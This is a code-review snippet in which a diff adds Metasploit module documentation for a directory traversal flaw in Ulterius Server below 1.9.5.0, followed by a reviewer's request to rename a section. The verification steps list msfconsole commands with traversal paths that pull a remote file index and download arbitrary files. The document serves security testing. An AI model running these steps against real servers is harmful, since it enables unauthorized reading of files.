documentation/modules/auxiliary/admin/http/ulterius_file_download.md

```diff
@@ -0,0 +1,79 @@
+## Overview
+
+This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's HttpServer.Process function call. While processing file requests, the HttpServer.Process function does not validate that the requested file is within the web server's root directory or a subdirectory.
+
+## Verification Steps
+
+- [ ] Install Ulterius Server < v1.9.5.0
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/ulterius_file_download`
+- [ ] `set index true`
+- [ ] `set targeturi '/…/fileIndex.db'`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify loot contains file system paths from remote file system.
+- [ ] `set index false`
+- [ ] `set targeturi '/C:/<path>/<to>/<file>'`
+- [ ] `run`
+- [ ] Verify contents of file
+
+## Exploiting the Vulnerability 
```

Comment:
Change the name to `Vulnerable Application` and put it after Description

Reply:
Changed.